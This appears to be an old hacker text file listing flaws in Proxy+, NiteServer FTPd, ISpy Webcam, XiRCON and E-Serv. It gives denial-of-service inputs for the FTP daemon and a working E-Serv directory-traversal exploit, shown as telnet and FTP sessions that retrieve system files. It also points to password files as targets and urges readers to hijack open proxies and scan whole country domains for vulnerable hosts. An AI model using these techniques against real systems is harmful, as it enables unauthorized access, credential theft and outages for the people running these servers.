.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
            "Bugs that I am embarassed to admit I found" by Wyzewun
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.

Yeap, found some dumb stuff that no-one in their right mind would care about,
that I would be embarassed putting on BugTraq, and that I seriously just don't
*want* for myself, so I figured I'd just chuck them here for lack of anywhere
better to put them. :)

----[ Table of Contents

[-*-] Proxy Plus
[-*-] NiteServer
[-*-] ISpy Webcam
[-*-] XiRCON
[-*-] E-Serv
[-*-] Generic Windoze Vulnerability

----[ Proxy Plus

The Proxy+ 2.30 proxy server available from www.proxyplus.cz appears to have
some insecure default settings.

As per default, remote administration of the proxy server is possible to
anyone who cares to point their browser to http://hostname:4400/admin

We must also consider that 99% of the people who are smart enough to know how
to setup an access list for Proxy+ will also be dumb enough to set it up for
localhost only security - forgetting the open web proxy on port 4480 - meaning
that anybody can *still* access the Administrator menu if they have a brain.
This is a concept originally explored in rfp's article in Phrack 54. Werd to
him. :)

Also, do not forget the Telnet gateway which is also open by default, which is
an alternative to a Wingate for purposes of anonymous bouncing. (Although,
unlike Wingate, Proxy+ *does* log by default and is thus not so incredibly
anonymous. :P And then again, people can remotely turn logging OFF by default,
so wtf) Regardless, the welcome banner looks like this, should you wish to
scan for it - You've probably seen one before...

<blank line>
TelNet Gateway Ready
Enter destination (host_name:port):

Overall, hacking yourself a Proxy Plus proxy is much better than a Wingate
because you can keep it all to yourself, administer it remotely etc. etc. -
it's just damn nice in general. :)

Oh, and Proxy+ Servers are most common in Czechoslovakia (.cz) if you wanna
try and scan for them.

----[ NiteServer FTPd

This server is coded in VB and so, as you can imagine, is vulnerable to
thousands of DoS attacks. The first occurs when the daemon is fed over 40 or
so "USER whatever" strings. The FTPd runs out of memory and commits suicide.

The second occurs when a password (PASS) is not terminated, and the daemon
just keeps on getting fed more and more characters, and allocating memory for
all of them. While the daemon is being attacked, it will not respond to any
users who are connecting to it, and the actual program will refuse to
communicate with anyone physcially at the host. Windows will become more slow
and unusable then it already is and the system may or may not fall over     
completely eventually. 

The third: login, then type "PORT fuck,me,but,is,this,ftpd,lame,or,what" and
then disconnect immediately. The FTP daemon will stop accepting connections.

The fourth: give a long argument to RNTO. Once again, it decides to stop
accepting connections. Is this daemon a fucking pussy or what? I could go on
to list more, but it would just be cruel. Shjeesh, what's even sadder is that
the author is trying to sell the source code to this thing: as if some-one
would actually want it - HEH!@#$%

----[ ISpy Webcam

The very popular ISpy Webcam by Creative stores the password for the FTP site
it uploads to in the registry under \\HKEY_CURRENT_USER\Software\ISpy\ISPY\FTP
in the "Password" value with a very laughable "encryption" scheme. Just a
substitution cipher. I would include the key, but really, it's not worth the
space. Just keep this in mind and figure the rest out yerself. :)

----[ XiRCON

The XiRCON IRC client disconnects from the IRC server it's connected to when
recieving overly long CTCP messages. What an elite client.

----[ E-Serv

E-Serv (available from www.eserv.ru) is a SMTP, POP3, NNTP, FTP, HTTP, Proxy,
and Finger server. When testing out The HTTP server on my box, which is
accesible by default on Port 3128 and will most probably be moved to 80 on
servers where it's being used as a webserver (It is also the Proxy's remote
administration thingy), I found it to have a serious security flaw. All
versions prior to 2.8 are vulnerable. We downloaded the "latest" version from
Tucows (2.5) and assumed the bug had not been fixed, but when we mailed the
authors of the software, turned out they had found the bug themselves and
fixed it in 2.8! Guess Tucows aren't into updating their archive, eh?
Regardless, old versions are still common and I don't think the vulnerability
has been covered publically, so let's get to the sploit...

[drew@kung-fusion]$ telnet ghay.windoze.box 3128
Trying 192.168.66.7...
Connected to ghay.windoze.box.
Escape character is '^]'.
GET /../../../../../../../../../../../../../../autoexec.bat HTTP/1.1

HTTP/1.1 200 OK
Content-Length: 297

@echo off
SET BLASTER=A220 I5 D1 T4
PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\JDK\BIN

CHOICE /C:YN /T:N,05 "Load SoftICE Debugger?"
If Errorlevel=2 Goto End
If Errorlevel=1 goto Softice

:SoftIce
echo Softice Loading
C:\wyze1\exec\SOFTICE\WINICE.EXE
goto end
:End
echo Starting Windows

Simple directory climbing Ala-Ali-Baba. :)

It then occured to me - "Hey, these people probably use the same routine for
*all* file access". Over to the doze box...

C:\wyze1>ftp localhost
Connected to wizdumb.
220 Eserv/2.5  FTP ready
User (wizdumb:(none)): anonymous
331 Password required
Password:
230 Login OK
ftp> ls /../../../../../../../../../../../
200 PORT command successful.
150 Opening data connection
226 Transfer complete
ftp> ls ../../../../../../../../../../../
200 PORT command successful.
150 Opening data connection
226 Transfer complete
ftp> ls 
200 PORT command successful.
150 Opening data connection
226 Transfer complete
ftp> get ../../../../../../../../../autoexec.bat
200 PORT command successful.
150 Opening data connection
226 Transfer complete
ftp: 421 bytes received in 0.05Seconds 8.42Kbytes/sec.
ftp> quit
221 Goodbye.

Hmm, well I was right to an extent. You can't list files, but you *can*
retrieve any file you want provided you know the name which is good enough if
we just go and retrieve the password files. :) And after all, I *might* be
able to list files, if the damn directory listing *worked*. *Sigh* :P Anyway,
we should get sam._ on NT boxes, but on 9x boxes you'll probably have to grab
the E-Serv password file which can be found in /../../../conf/EServ.ini and
uses fairly trivial encryption. Also note that the FTP server will be on port
3121 by default, and may be moved to port 21 on some boxes.

Now for a few interesting things that will probably apply to current versions
as well: in E-Serv is that the anonymous FTP account applies for POP3 as well,
so an E-Serv server can be a nice anonymous mail pickup for anyone who cares
to connect to the POP3 daemon and login anonymously. The daemon also does
stuff like making the modem dial/hangup CGI feature (http://host:3128/dial)
accessible to anyone with a user-level login, including anonymous, although it
can be configured to be Admin only, it is like this by default. Ditto for the
webmail interface accepting anonymous logins. And finally - a hint: looking
for folks that run E-Serv? Scan Good ol' Mother Russia, heh.

----[ Generic Windoze vulnerability

So many Windoze FTP/HTTP daemons allow you to play with files with device
special filenames like COM1. This can result in allowing you to disconnect 
their modems, or in a worst-case scenario, taking full control of their 
modems and/or printers. 

----[ Thats it for now

My dog ate this frog, and it lay down in our lounge for a week before it died.
You shouldn't let your dog eat frogs, man.